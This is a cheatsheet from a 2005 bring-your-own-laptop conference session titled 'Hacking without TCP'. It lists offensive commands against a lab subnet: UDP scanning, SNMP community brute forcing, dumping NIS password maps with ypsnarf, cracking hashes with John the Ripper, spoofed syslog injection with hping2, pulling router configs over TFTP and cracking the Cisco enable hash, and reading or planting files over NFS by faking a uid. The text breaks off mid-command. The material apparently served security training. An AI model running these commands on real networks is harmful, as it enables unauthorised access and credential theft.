Hacking without TCP by Chuck Willis (chuck at securityfoundry dot com) Bring Your Own Laptop Cheatsheet / Checklist IT Underground – Prague – 18 February 2005 Slides and other information available at www.securityfoundry.com
route add -net 192.168.243.0 netmask 255.255.255.0 gw (my_ip) eth0
nmap -sU -sV -v -v -p 7,13,53,111,161,389,2049 192.168.243.0/24
nc -un hostname port
host ip_to_lookup server_ip
./hydra ip_address snmp -P file.txt
snmpwalk -c community_string hostname > tmpfile ./guess.sh "snmpwalk -c " filename " ip_address"
./ypsnarf ip_address domain_name passwd.byname > filename
./john filename
Xnest -query ip_address:1
echo “<8>itunderground rulez!” > syslogfile.txt
hping2 ip_address -2 -s 514 -p 514 -d 25 -E syslogfile.txt -c 1 -a 1.2.3.4
./guess.sh "tftp ip_address -c get " filename ""
echo “test:$1$....” > cisco.txt (where $1$... is the enable string from the router configuration file) ./john cisco.txt
nfs nfs> host ip_address (connects) nfs> dump (gets list of shared directories) nfs> mount -U /dir/name nfs> ls nfs> get filename nfs> ls -l drwxr-xr-x 2 500 0 4096 Dec 20 21:58 . drwxr-xr-x 2 500 0 4096 Dec 20 21:58 .. -rw-r--r-- 1 0 0 5 Dec 20 21:51 asdf.txt nfs> uid 500 nfs> put filename
nbtstat ip_address |